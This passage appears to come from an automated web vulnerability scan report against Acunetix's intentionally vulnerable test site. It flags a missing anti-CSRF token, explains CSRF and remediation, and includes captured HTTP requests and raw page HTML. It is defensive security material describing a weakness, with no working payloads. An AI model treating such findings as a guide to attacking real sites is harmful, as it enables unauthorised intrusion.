style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          <form name="Form1" method="post" action="ReadNews.aspx?id=0" id="Form1">
          Solution

          フェーズ: アーキテクチャと設計

          同脆弱性を引き起こさせない、あるいは容易に回避可能な精査されたライブラリ、あるいはフレームワークを使用してください。

          For example, use anti-CSRF packages such as the OWASP CSRFGuard.

          Phase: Implementation

          Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

          Phase: Architecture and Design

          Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

          Note that this can be bypassed using XSS.

          Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

          Note that this can be bypassed using XSS.

          Use the ESAPI Session Management control.

          This control includes a component for CSRF.

          Do not use the GET method for any request that triggers a state change.

          Phase: Implementation

          Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.

        10. GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
          Alert tags
          Alert description

          在提交的HTML表单中中找不到反CSRF令牌。

          A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

          CSRF attacks are effective in a number of situations, including:

          * The victim has an active session on the target site.

          * The victim is authenticated via HTTP auth on the target site.

          * The victim is on the same local network as the target site.

          CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.

          Other info

          No known Anti-CSRF token [anticsrf, CSRFToken, __RequestVerificationToken, csrfmiddlewaretoken, authenticity_token, OWASP_CSRFTOKEN, anoncsrf, csrf_token, _csrf, _csrfSecret, __csrf_magic, CSRF, _token, _csrf_token] was found in the following HTML form: [Form 1: "__EVENTARGUMENT" "__EVENTTARGET" "__EVENTVALIDATION" "__VIEWSTATE" "__VIEWSTATEGENERATOR" ].

          Request
          Request line and header section (341 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=2
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 30393
          
          
          Response body (30393 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjZGRk4+8K4F/0js11lBw12IN/OFdqHcc=" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKpz/fHDgK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q90tjPbD69UwpHdROB4Qqxfz1aHXA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV>
